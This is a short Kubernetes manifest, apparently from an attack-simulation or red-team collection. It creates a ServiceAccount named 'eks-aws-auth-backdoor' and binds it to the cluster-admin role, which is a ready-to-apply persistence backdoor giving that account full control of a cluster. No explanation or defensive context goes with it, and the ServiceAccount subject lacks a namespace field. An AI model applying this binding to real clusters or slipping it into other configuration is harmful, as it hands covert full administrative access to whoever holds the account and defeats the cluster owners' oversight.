# ClusterRoleBinding with cluster-admin access
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: eks-aws-auth-backdoor
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
  - kind: ServiceAccount
    name: eks-aws-auth-backdoor
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: eks-aws-auth-backdoor